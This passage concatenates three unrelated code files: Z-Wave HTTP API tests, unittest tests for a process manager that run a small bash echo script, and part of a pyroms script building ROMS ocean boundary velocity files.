value = MockValue(index=12, command_class=const.COMMAND_CLASS_CONFIGURATION)
value.label = "label"
value.help = "help"
value.type = "type"
value.data = "data"
value.data_items = ["item1", "item2"]
value.max = "max"
value.min = "min"
node.values = {12: value}
network.nodes = {2: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/config/2")
assert resp.status == 200
result = await resp.json()
assert result == {
"12": {
"data": "data",
"data_items": ["item1", "item2"],
"help": "help",
"label": "label",
"max": "max",
"min": "min",
"type": "type",
}
}
async def test_get_config_noconfig_node(hass, client):
"""Test getting config on node without config."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=2)
network.nodes = {2: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/config/2")
assert resp.status == 200
result = await resp.json()
assert result == {}
async def test_get_config_nonode(hass, client):
"""Test getting config on nonexisting node."""
network = hass.data[DATA_NETWORK] = MagicMock()
network.nodes = {1: 1, 5: 5}
resp = await client.get("/api/zwave/config/2")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert result == {"message": "Node not found"}
async def test_get_usercodes_nonode(hass, client):
"""Test getting usercodes on nonexisting node."""
network = hass.data[DATA_NETWORK] = MagicMock()
network.nodes = {1: 1, 5: 5}
resp = await client.get("/api/zwave/usercodes/2")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert result == {"message": "Node not found"}
async def test_get_usercodes(hass, client):
"""Test getting usercodes on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_USER_CODE])
value = MockValue(index=0, command_class=const.COMMAND_CLASS_USER_CODE)
value.genre = const.GENRE_USER
value.label = "label"
value.data = "1234"
node.values = {0: value}
network.nodes = {18: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/usercodes/18")
assert resp.status == 200
result = await resp.json()
assert result == {"0": {"code": "1234", "label": "label", "length": 4}}
async def test_get_usercode_nousercode_node(hass, client):
"""Test getting usercodes on node without usercodes."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18)
network.nodes = {18: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/usercodes/18")
assert resp.status == 200
result = await resp.json()
assert result == {}
async def test_get_usercodes_no_genreuser(hass, client):
"""Test getting usercodes on node missing genre user."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_USER_CODE])
value = MockValue(index=0, command_class=const.COMMAND_CLASS_USER_CODE)
value.genre = const.GENRE_SYSTEM
value.label = "label"
value.data = "1234"
node.values = {0: value}
network.nodes = {18: node}
node.get_values.return_value = node.values
resp = await client.get("/api/zwave/usercodes/18")
assert resp.status == 200
result = await resp.json()
assert result == {}
async def test_save_config_no_network(hass, client):
"""Test saving configuration without network data."""
resp = await client.post("/api/zwave/saveconfig")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert result == {"message": "No Z-Wave network data found"}
async def test_save_config(hass, client):
"""Test saving configuration."""
network = hass.data[DATA_NETWORK] = MagicMock()
resp = await client.post("/api/zwave/saveconfig")
assert resp.status == 200
result = await resp.json()
assert network.write_config.called
assert result == {"message": "Z-Wave configuration saved to file"}
async def test_get_protection_values(hass, client):
"""Test getting protection values on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {18: node}
node.value = value
node.get_protection_item.return_value = "Unprotected"
node.get_protection_items.return_value = value.data_items
node.get_protections.return_value = {value.value_id: "Object"}
resp = await client.get("/api/zwave/protection/18")
assert resp.status == 200
result = await resp.json()
assert node.get_protections.called
assert node.get_protection_item.called
assert node.get_protection_items.called
assert result == {
"value_id": "123456",
"selected": "Unprotected",
"options": ["Unprotected", "Protection by Sequence", "No Operation Possible"],
}
async def test_get_protection_values_nonexisting_node(hass, client):
"""Test getting protection values on node with wrong nodeid."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {17: node}
node.value = value
resp = await client.get("/api/zwave/protection/18")
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert not node.get_protections.called
assert not node.get_protection_item.called
assert not node.get_protection_items.called
assert result == {"message": "Node not found"}
async def test_get_protection_values_without_protectionclass(hass, client):
"""Test getting protection values on node without protectionclass."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18)
value = MockValue(value_id=123456, index=0, instance=1)
network.nodes = {18: node}
node.value = value
resp = await client.get("/api/zwave/protection/18")
assert resp.status == 200
result = await resp.json()
assert not node.get_protections.called
assert not node.get_protection_item.called
assert not node.get_protection_items.called
assert result == {}
async def test_set_protection_value(hass, client):
"""Test setting protection value on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {18: node}
node.value = value
resp = await client.post(
"/api/zwave/protection/18",
data=json.dumps({"value_id": "123456", "selection": "Protection by Sequence"}),
)
assert resp.status == 200
result = await resp.json()
assert node.set_protection.called
assert result == {"message": "Protection setting succsessfully set"}
async def test_set_protection_value_failed(hass, client):
"""Test setting protection value failed on node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=18, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {18: node}
node.value = value
node.set_protection.return_value = False
resp = await client.post(
"/api/zwave/protection/18",
data=json.dumps({"value_id": "123456", "selection": "Protecton by Sequence"}),
)
assert resp.status == 202
result = await resp.json()
assert node.set_protection.called
assert result == {"message": "Protection setting did not complete"}
async def test_set_protection_value_nonexisting_node(hass, client):
"""Test setting protection value on nonexisting node."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=17, command_classes=[const.COMMAND_CLASS_PROTECTION])
value = MockValue(
value_id=123456,
index=0,
instance=1,
command_class=const.COMMAND_CLASS_PROTECTION,
)
value.label = "Protection Test"
value.data_items = [
"Unprotected",
"Protection by Sequence",
"No Operation Possible",
]
value.data = "Unprotected"
network.nodes = {17: node}
node.value = value
node.set_protection.return_value = False
resp = await client.post(
"/api/zwave/protection/18",
data=json.dumps({"value_id": "123456", "selection": "Protecton by Sequence"}),
)
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert not node.set_protection.called
assert result == {"message": "Node not found"}
async def test_set_protection_value_missing_class(hass, client):
"""Test setting protection value on node without protectionclass."""
network = hass.data[DATA_NETWORK] = MagicMock()
node = MockNode(node_id=17)
value = MockValue(value_id=123456, index=0, instance=1)
network.nodes = {17: node}
node.value = value
node.set_protection.return_value = False
resp = await client.post(
"/api/zwave/protection/17",
data=json.dumps({"value_id": "123456", "selection": "Protecton by Sequence"}),
)
assert resp.status == HTTP_NOT_FOUND
result = await resp.json()
assert not node.set_protection.called
assert result == {"message": "No protection commandclass on this node"}
|
|
import asyncore
import unittest
import shutil
import os
import signal
import time
import threading
from glide.process import Process
class Tester(unittest.TestCase):
def setUp(self):
if not os.path.exists('temp'):
os.mkdir('temp')
self.test_file = 'temp/execute.sh'
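# Helper script driven by the tests below: prints "$1-<i>" every $2 seconds for 20
# iterations, and on SIGTERM prints "$1-#" $3 times (0.4 s apart) before exiting.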
test_code = """#!/bin/bash
trap 'for i in $(seq 1 $3); do echo "$1-#"; sleep 0.4; done; exit' SIGTERM
for i in `seq 1 20`; do echo $1-$i; sleep $2; done
"""
with open(self.test_file, 'w') as fp:
fp.write(test_code)
# make executable
os.chmod(self.test_file, 0o777)
# signal trap
signal.signal(signal.SIGCHLD, self.proc_exit)
self.test_blasted = []
def tearDown(self):
shutil.rmtree('temp')
def proc_exit(self, signum, frame):
pid, exitcode = os.waitpid(-1, os.WNOHANG | os.WUNTRACED)
self.process.cleanup()
def blast_save_to_test_blasted(self, message, index):
self.test_blasted.append('[%s] %s' % (index, message.message,))
def blast_save_process_to_test_blasted(self, message, index):
self.test_blasted.append(str(self.process)[0:36])
def test_normal_execution(self):
"""test output of a normal process"""
self.process = Process(
name='test_execute1',
path=[self.test_file, '1', '0.1', '7'],
max_nl=10,
bm=self.blast_save_to_test_blasted,
try_restart=0,
)
result, message = self.process.start()
self.assertEquals(result, True)
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """[0] 1-1
[1] 1-2
[2] 1-3
[3] 1-4
[4] 1-5
[5] 1-6
[6] 1-7
[7] 1-8
[8] 1-9
[9] 1-10
[10] 1-11
[11] 1-12
[12] 1-13
[13] 1-14
[14] 1-15
[15] 1-16
[16] 1-17
[17] 1-18
[18] 1-19
[19] 1-20""")
def test_sigterm_execution(self):
"""test output of a terminated process"""
self.process = Process(
name='test_execute2',
path=[self.test_file, '2', '0.3', '7'],
max_nl=10,
bm=self.blast_save_to_test_blasted,
try_restart=0,
)
self.process.start()
def send_signal_to_process():
""" signal sigterm to the process """
time.sleep(2)
self.process.terminate()
ssp_thread = threading.Thread(target=send_signal_to_process)
ssp_thread.start()
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """[0] 2-1
[1] 2-2
[2] 2-3
[3] 2-4
[4] 2-5
[5] 2-6
[6] 2-7
[7] 2-#
[8] 2-#
[9] 2-#
[10] 2-#
[11] 2-#
[12] 2-#
[13] 2-#""")
def test_show_status(self):
"""test showing status of the process"""
self.process = Process(
name="text_execute3",
path=[self.test_file, '3', '0.01', '7'],
max_nl=20,
bm=self.blast_save_process_to_test_blasted,
try_restart=0,
)
self.process.start()
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """\
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid
text_execute3 RUNNING pid""")
def test_restart(self):
self.process = Process(
name="text_execute4",
path=[self.test_file, '4', '0.2', '7'],
max_nl=20,
bm=self.blast_save_to_test_blasted,
try_restart=0,
)
self.process.start()
def send_signal_to_process():
""" signal sigterm to the process """
time.sleep(1)
self.process.restart()
ssp_thread = threading.Thread(target=send_signal_to_process)
ssp_thread.start()
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """\
[0] 4-1
[1] 4-2
[2] 4-3
[3] 4-4
[4] 4-5
[5] 4-#
[6] 4-#
[7] 4-#
[8] 4-#
[9] 4-#
[10] 4-#
[11] 4-#
[12] 4-1
[13] 4-2
[14] 4-3
[15] 4-4
[16] 4-5
[17] 4-6
[18] 4-7
[19] 4-8
[20] 4-9
[21] 4-10
[22] 4-11
[23] 4-12
[24] 4-13
[25] 4-14
[26] 4-15
[27] 4-16
[28] 4-17
[29] 4-18
[30] 4-19
[31] 4-20""")
def test_hanging_process(self):
self.process = Process(
name="text_execute5",
path=[self.test_file, '5', '0.8', '50'],
max_nl=20,
bm=self.blast_save_to_test_blasted,
try_restart=0,
)
self.process.start()
def send_signal_to_process():
""" signal sigterm to the process """
time.sleep(2)
self.process.terminate()
ssp_thread = threading.Thread(target=send_signal_to_process)
ssp_thread.start()
try:
asyncore.loop(1)
except: # from asyncore.file_dispatcher.close(self)
pass
self.assertEquals('\n'.join(self.test_blasted), """\
[0] 5-1
[1] 5-2
[2] 5-3
[3] 5-#
[4] 5-#
[5] 5-#
[6] 5-#
[7] 5-#
[8] 5-#
[9] 5-#
[10] 5-#
[11] 5-#
[12] 5-#
[13] 5-#
[14] 5-#
[15] 5-#
[16] 5-#
[17] 5-#
[18] 5-#
[19] 5-#
[20] 5-#
[21] 5-#
[22] 5-#
[23] 5-#
[24] 5-#
[25] 5-#
[26] 5-#
[27] 5-#
[28] 5-#
[29] 5-#
[30] 5-#
[31] 5-#
[32] 5-#
[33] 5-#
[34] 5-#
[35] 5-#
[36] 5-#
[37] 5-#
[38] 5-#
[39] 5-#
[40] 5-#
[41] 5-#
[42] 5-#
[43] 5-#
[44] 5-#
[45] 5-#
[46] 5-#
[47] 5-#
[48] 5-#
[49] 5-#
[50] 5-#
[51] 5-#
[52] 5-#""")
|
|
import numpy as np
import os
try:
import netCDF4 as netCDF
except ImportError:
import netCDF3 as netCDF
import matplotlib.pyplot as plt
import time
from datetime import datetime
from matplotlib.dates import date2num, num2date
import pyroms
import pyroms_toolbox
import _remapping
class nctime(object):
pass
def remap_bdry_uv(src_file, src_grd, dst_grd, dmax=0, cdepth=0, kk=0, dst_dir='./'):
# YELLOW grid sub-sample
xrange=(225, 275); yrange=(190, 240)
# get time
nctime.long_name = 'time'
nctime.units = 'days since 1900-01-01 00:00:00'
# time reference "days since 1900-01-01 00:00:00"
ref = datetime(1900, 1, 1, 0, 0, 0)
ref = date2num(ref)
tag = src_file.rsplit('/')[-1].rsplit('_')[-1].rsplit('-')[0]
year = int(tag[:4])
month = int(tag[4:6])
day = int(tag[6:])
time = datetime(year, month, day, 0, 0, 0)
time = date2num(time)
time = time - ref
time = time + 2.5 # 5-day average
# get dimensions
Mp, Lp = dst_grd.hgrid.mask_rho.shape
# create destination file
dst_file = src_file.rsplit('/')[-1]
dst_fileu = dst_dir + dst_file[:-4] + '_u_bdry_' + dst_grd.name + '.nc'
print '\nCreating destination file', dst_fileu
if os.path.exists(dst_fileu):
os.remove(dst_fileu)
pyroms_toolbox.nc_create_roms_file(dst_fileu, dst_grd, nctime)
dst_filev = dst_dir + dst_file[:-4] + '_v_bdry_' + dst_grd.name + '.nc'
print 'Creating destination file', dst_filev
if os.path.exists(dst_filev):
os.remove(dst_filev)
pyroms_toolbox.nc_create_roms_file(dst_filev, dst_grd, nctime)
# open destination file
ncu = netCDF.Dataset(dst_fileu, 'a', format='NETCDF3_CLASSIC')
ncv = netCDF.Dataset(dst_filev, 'a', format='NETCDF3_CLASSIC')
#load var
cdf = netCDF.Dataset(src_file)
src_varu = cdf.variables['u']
src_varv = cdf.variables['v']
#get missing value
spval = src_varu._FillValue
# YELLOW grid sub-sample
src_varu = src_varu[:, yrange[0]:yrange[1]+1, xrange[0]:xrange[1]+1]
src_varv = src_varv[:, yrange[0]:yrange[1]+1, xrange[0]:xrange[1]+1]
# get weights file
wts_file = 'remap_weights_SODA_2.1.6_to_YELLOW_bilinear_uv_to_rho.nc'
# build intermediate zgrid
zlevel = -src_grd.z_t[::-1,0,0]
nzlevel = len(zlevel)
dst_zcoord = pyroms.vgrid.z_coordinate(dst_grd.vgrid.h, zlevel, nzlevel)
dst_grdz = pyroms.grid.ROMS_Grid(dst_grd.name+'_Z', dst_grd.hgrid, dst_zcoord)
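# The source fields are first remapped horizontally onto the destination grid at fixed
# z levels (dst_grdz) and only afterwards interpolated vertically onto the ROMS sigma
# levels of dst_grd.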
# create variable in destination file
print 'Creating variable u_north'
ncu.createVariable('u_north', 'f8', ('ocean_time', 's_rho', 'xi_u'), fill_value=spval)
ncu.variables['u_north'].long_name = '3D u-momentum north boundary condition'
ncu.variables['u_north'].units = 'meter second-1'
ncu.variables['u_north'].field = 'u_north, scalar, series'
print 'Creating variable u_south'
ncu.createVariable('u_south', 'f8', ('ocean_time', 's_rho', 'xi_u'), fill_value=spval)
ncu.variables['u_south'].long_name = '3D u-momentum south boundary condition'
ncu.variables['u_south'].units = 'meter second-1'
ncu.variables['u_south'].field = 'u_south, scalar, series'
print 'Creating variable u_east'
ncu.createVariable('u_east', 'f8', ('ocean_time', 's_rho', 'eta_u'), fill_value=spval)
ncu.variables['u_east'].long_name = '3D u-momentum east boundary condition'
ncu.variables['u_east'].units = 'meter second-1'
ncu.variables['u_east'].field = 'u_east, scalar, series'
print 'Creating variable u_west'
ncu.createVariable('u_west', 'f8', ('ocean_time', 's_rho', 'eta_u'), fill_value=spval)
ncu.variables['u_west'].long_name = '3D u-momentum west boundary condition'
ncu.variables['u_west'].units = 'meter second-1'
ncu.variables['u_west'].field = 'u_west, scalar, series'
# create variable in destination file
print 'Creating variable ubar_north'
ncu.createVariable('ubar_north', 'f8', ('ocean_time', 'xi_u'), fill_value=spval)
ncu.variables['ubar_north'].long_name = '2D u-momentum north boundary condition'
ncu.variables['ubar_north'].units = 'meter second-1'
ncu.variables['ubar_north'].field = 'ubar_north, scalar, series'
print 'Creating variable ubar_south'
ncu.createVariable('ubar_south', 'f8', ('ocean_time', 'xi_u'), fill_value=spval)
ncu.variables['ubar_south'].long_name = '2D u-momentum south boundary condition'
ncu.variables['ubar_south'].units = 'meter second-1'
ncu.variables['ubar_south'].field = 'ubar_south, scalar, series'
print 'Creating variable ubar_east'
ncu.createVariable('ubar_east', 'f8', ('ocean_time', 'eta_u'), fill_value=spval)
ncu.variables['ubar_east'].long_name = '2D u-momentum east boundary condition'
ncu.variables['ubar_east'].units = 'meter second-1'
ncu.variables['ubar_east'].field = 'ubar_east, scalar, series'
print 'Creating variable ubar_west'
ncu.createVariable('ubar_west', 'f8', ('ocean_time', 'eta_u'), fill_value=spval)
ncu.variables['ubar_west'].long_name = '2D u-momentum west boundary condition'
ncu.variables['ubar_west'].units = 'meter second-1'
ncu.variables['ubar_west'].field = 'ubar_west, scalar, series'
print 'Creating variable v_north'
ncv.createVariable('v_north', 'f8', ('ocean_time', 's_rho', 'xi_v'), fill_value=spval)
ncv.variables['v_north'].long_name = '3D v-momentum north boundary condition'
ncv.variables['v_north'].units = 'meter second-1'
ncv.variables['v_north'].field = 'v_north, scalar, series'
print 'Creating variable v_south'
ncv.createVariable('v_south', 'f8', ('ocean_time', 's_rho', 'xi_v'), fill_value=spval)
ncv.variables['v_south'].long_name = '3D v-momentum south boundary condition'
ncv.variables['v_south'].units = 'meter second-1'
ncv.variables['v_south'].field = 'v_south, scalar, series'
print 'Creating variable v_east'
ncv.createVariable('v_east', 'f8', ('ocean_time', 's_rho', 'eta_v'), fill_value=spval)
ncv.variables['v_east'].long_name = '3D v-momentum east boundary condition'
ncv.variables['v_east'].units = 'meter second-1'
ncv.variables['v_east'].field = 'v_east, scalar, series'
print 'Creating variable v_west'
ncv.createVariable('v_west', 'f8', ('ocean_time', 's_rho', 'eta_v'), fill_value=spval)
ncv.variables['v_west'].long_name = '3D v-momentum west boundary condition'
ncv.variables['v_west'].units = 'meter second-1'
ncv.variables['v_west'].field = 'v_west, scalar, series'
print 'Creating variable vbar_north'
ncv.createVariable('vbar_north', 'f8', ('ocean_time', 'xi_v'), fill_value=spval)
ncv.variables['vbar_north'].long_name = '2D v-momentum north boundary condition'
ncv.variables['vbar_north'].units = 'meter second-1'
ncv.variables['vbar_north'].field = 'vbar_north, scalar, series'
print 'Creating variable vbar_south'
ncv.createVariable('vbar_south', 'f8', ('ocean_time', 'xi_v'), fill_value=spval)
ncv.variables['vbar_south'].long_name = '2D v-momentum south boundary condition'
ncv.variables['vbar_south'].units = 'meter second-1'
ncv.variables['vbar_south'].field = 'vbar_south, scalar, series'
print 'Creating variable vbar_east'
ncv.createVariable('vbar_east', 'f8', ('ocean_time', 'eta_v'), fill_value=spval)
ncv.variables['vbar_east'].long_name = '2D v-momentum east boundary condition'
ncv.variables['vbar_east'].units = 'meter second-1'
ncv.variables['vbar_east'].field = 'vbar_east, scalar, series'
print 'Creating variable vbar_west'
ncv.createVariable('vbar_west', 'f8', ('ocean_time', 'eta_v'), fill_value=spval)
ncv.variables['vbar_west'].long_name = '2D v-momentum west boundary condition'
ncv.variables['vbar_west'].units = 'meter second-1'
    ncv.variables['vbar_west'].field = 'vbar_west, scalar, series'
    # remapping
print 'remapping and rotating u and v from', src_grd.name, \
'to', dst_grd.name
print 'time =', time
# flood the grid
print 'flood the grid'
src_uz = pyroms_toolbox.BGrid_SODA.flood(src_varu, src_grd, Bpos='uv', \
spval=spval, dmax=dmax, cdepth=cdepth, kk=kk)
src_vz = pyroms_toolbox.BGrid_SODA.flood(src_varv, src_grd, Bpos='uv', \
spval=spval, dmax=dmax, cdepth=cdepth, kk=kk)
# horizontal interpolation using scrip weights
print 'horizontal interpolation using scrip weights'
dst_uz = pyroms.remapping.remap(src_uz, wts_file, \
spval=spval)
dst_vz = pyroms.remapping.remap(src_vz, wts_file, \
spval=spval)
# vertical interpolation from standard z level to sigma
print 'vertical interpolation from standard z level to sigma'
dst_u_north = pyroms.remapping.z2roms(dst_uz[::-1, Mp-2:Mp, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(Mp-2,Mp))
dst_u_south = pyroms.remapping.z2roms(dst_uz[::-1, 0:2, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(0,2))
dst_u_east = pyroms.remapping.z2roms(dst_uz[::-1, 0:Mp, Lp-2:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(Lp-2,Lp), jrange=(0,Mp))
dst_u_west = pyroms.remapping.z2roms(dst_uz[::-1, 0:Mp, 0:2], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,2), jrange=(0,Mp))
dst_v_north = pyroms.remapping.z2roms(dst_vz[::-1, Mp-2:Mp, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(Mp-2,Mp))
dst_v_south = pyroms.remapping.z2roms(dst_vz[::-1, 0:2, 0:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,Lp), jrange=(0,2))
dst_v_east = pyroms.remapping.z2roms(dst_vz[::-1, 0:Mp, Lp-2:Lp], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(Lp-2,Lp), jrange=(0,Mp))
dst_v_west = pyroms.remapping.z2roms(dst_vz[::-1, 0:Mp, 0:2], \
dst_grdz, dst_grd, Cpos='rho', spval=spval, \
flood=False, irange=(0,2), jrange=(0,Mp))
# rotate u,v fields
wtsfile = 'remap_weights_GFDL_CM2.1_to_NEP5_bilinear_t_to_rho.nc'
src_angle = np.zeros(dst_grd.hgrid.angle_rho.shape)
dst_angle = dst_grd.hgrid.angle_rho
angle = dst_angle - src_angle
angle = np.tile(angle, (dst_grd.vgrid.N, 1, 1))
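    # rotation below: combine u and v into a complex velocity U = u + i*v and
    # multiply by exp(-i*theta), where theta = dst_angle - src_angle; the real
    # and imaginary parts of the product are the rotated u and v components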
U_north = dst_u_north + dst_v_north*1j
eitheta_north = np.exp(-1j*angle[:,Mp-2:Mp, 0:Lp])
U_north = U_north * eitheta_north
dst_u_north = np.real(U_north)
dst_v_north = np.imag(U_north)
U_south = dst_u_south + dst_v_south*1j
eitheta_south = np.exp(-1j*angle[:,0:2, 0:Lp])
U_south = U_south * eitheta_south
dst_u_south = np.real(U_south)
dst_v_south = np.imag(U_south)
U_east = dst_u_east + dst_v_east*1j
eitheta_east = np.exp(-1j*angle[:,0:Mp, Lp-2:Lp])
U_east = U_east * eitheta_east
dst_u_east = np.real(U_east)
dst_v_east = np.imag(U_east)
U_west = dst_u_west + dst_v_west*1j
eitheta_west = np.exp(-1j*angle[:,0:Mp, 0:2])
U_west = U_west * eitheta_west
dst_u_west = np.real(U_west)
dst_v_west = np.imag(U_west)
# move back to u,v points
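    # (values interpolated at rho points are averaged pairwise onto the
    # staggered u points along xi and onto the v points along eta)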
dst_u_north = 0.5 * np.squeeze(dst_u_north[:,-1,:-1] + dst_u_north[:,-1,1:])
dst_v_north = 0.5 * np.squeeze(dst_v_north[:,:-1,:] + dst_v_north[:,1:,:])
dst_u_south = 0.5 * np.squeeze(dst_u_south[:,0,:-1] + dst_u_south[:,0,1:])
dst_v_south = 0.5 * np.squeeze(dst_v_south[:,:-1,:] + dst_v_south[:,1:,:])
dst_u_east = 0.5 * np.squeeze(dst_u_east[:,:,:-1] + dst_u_east[:,:,1:])
dst_v_east = 0.5 * np.squeeze(dst_v_east[:,:-1,-1] + dst_v_east[:,1:,-1])
dst_u_west = 0.5 * np.squeeze(dst_u_west[:,:,:-1] + dst_u_west[:,:,1:])
dst_v_west = 0.5 * np.squeeze(dst_v_west[:,:-1,0] + dst_v_west[:,1:,0])
# spval
idxu_north = np.where(dst_grd.hgrid.mask_u[-1,:] == 0)
idxv_north = np.where(dst_grd.hgrid.mask_v[-1,:] == 0)
idxu_south = np.where(dst_grd.hgrid.mask_u[0,:] == 0)
idxv_south = np.where(dst_grd.hgrid.mask_v[0,:] == 0)
idxu_east = np.where(dst_grd.hgrid.mask_u[:,-1] == 0)
idxv_east = np.where(dst_grd.hgrid.mask_v[:,-1] == 0)
idxu_west = np.where(dst_grd.hgrid.mask_u[:,0] == 0)
idxv_west = np.where(dst_grd.hgrid.mask_v[:,0] == 0)
for n in range(dst_grd.vgrid.N):
dst_u_north[n, idxu_north[0]] = spval
dst_v_north[n, idxv_north[0]] = spval
dst_u_south[n, idxu_south[0]] = spval
dst_v_south[n, idxv_south[0]] = spval
dst_u_east[n, idxu_east[0]] = spval
dst_v_east[n, idxv_east[0]] = spval
dst_u_west[n, idxu_west[0]] = spval
dst_v_west[n, idxv_west[0]] = spval
# compute depth average velocity ubar and vbar
# get z at the right position
z_u_north = 0.5 * (dst_grd.vgrid.z_w[0,:,-1,:-1] + dst_grd.vgrid.z_w[0,:,-1,1:])
z_v_north = 0.5 * (dst_grd.vgrid.z_w[0,:,-1,:] + dst_grd.vgrid.z_w[0,:,-2,:])
z_u_south = 0.5 * (dst_grd.vgrid.z_w[0,:,0,:-1] + dst_grd.vgrid.z_w[0,:,0,1:])
z_v_south = 0.5 * (dst_grd.vgrid.z_w[0,:,0,:] + dst_grd.vgrid.z_w[0,:,1,:])
z_u_east = 0.5 * (dst_grd.vgrid.z_w[0,:,:,-1] + dst_grd.vgrid.z_w[0,:,:,-2])
z_v_east = 0.5 * (dst_grd.vgrid.z_w[0,:,:-1,-1] + dst_grd.vgrid.z_w[0,:,1:,-1])
z_u_west = 0.5 * (dst_grd.vgrid.z_w[0,:,:,0] + dst_grd.vgrid.z_w[0,:,:,1])
z_v_west = 0.5 * (dst_grd.vgrid.z_w[0,:,:-1,0] + dst_grd.vgrid.z_w[0,:,1:,0])
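    # depth average below: ubar_i = sum_k(u_{k,i} * dz_{k,i}) / h_i, with dz
    # from np.diff of the layer interfaces z_w and total depth h_i = -z_w[0,i]
    # (the deepest interface), matching the loops that follow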
dst_ubar_north = np.zeros(dst_u_north.shape[1])
dst_ubar_south = np.zeros(dst_u_south.shape[1])
dst_ubar_east = np.zeros(dst_u_east.shape[1])
dst_ubar_west = np.zeros(dst_u_west.shape[1])
dst_vbar_north = np.zeros(dst_v_north.shape[1])
dst_vbar_south = np.zeros(dst_v_south.shape[1])
dst_vbar_east = np.zeros(dst_v_east.shape[1])
dst_vbar_west = np.zeros(dst_v_west.shape[1])
for i in range(dst_u_north.shape[1]):
dst_ubar_north[i] = (dst_u_north[:,i] * np.diff(z_u_north[:,i])).sum() / -z_u_north[0,i]
dst_ubar_south[i] = (dst_u_south[:,i] * np.diff(z_u_south[:,i])).sum() / -z_u_south[0,i]
for i in range(dst_v_north.shape[1]):
dst_vbar_north[i] = (dst_v_north[:,i] * np.diff(z_v_north[:,i])).sum() / -z_v_north[0,i]
dst_vbar_south[i] = (dst_v_south[:,i] * np.diff(z_v_south[:,i])).sum() / -z_v_south[0,i]
for j in range(dst_u_east.shape[1]):
dst_ubar_east[j] = (dst_u_east[:,j] * np.diff(z_u_east[:,j])).sum() / -z_u_east[0,j]
dst_ubar_west[j] = (dst_u_west[:,j] * np.diff(z_u_west[:,j])).sum() / -z_u_west[0,j]
for j in range(dst_v_east.shape[1]):
dst_vbar_east[j] = (dst_v_east[:,j] * np.diff(z_v_east[:,j])).sum() / -z_v_east[0,j]
dst_vbar_west[j] = (dst_v_west[:,j] * np.diff(z_v_west[:,j])).sum() / -z_v_west[0,j]
#mask
dst_ubar_north = np.ma.masked_where(dst_grd.hgrid.mask_u[-1,:] == 0, dst_ubar_north)
dst_ubar_south = np.ma.masked_where(dst_grd.hgrid.mask_u[0,:] == 0, dst_ubar_south)
dst_ubar_east = np.ma.masked_where(dst_grd.hgrid.mask_u[:,-1] == 0, dst_ubar_east)
dst_ubar_west = np.ma.masked_where(dst_grd.hgrid.mask_u[:,0] == 0, dst_ubar_west)
dst_vbar_north = np.ma.masked_where(dst_grd.hgrid.mask_v[-1,:] == 0, dst_vbar_north)
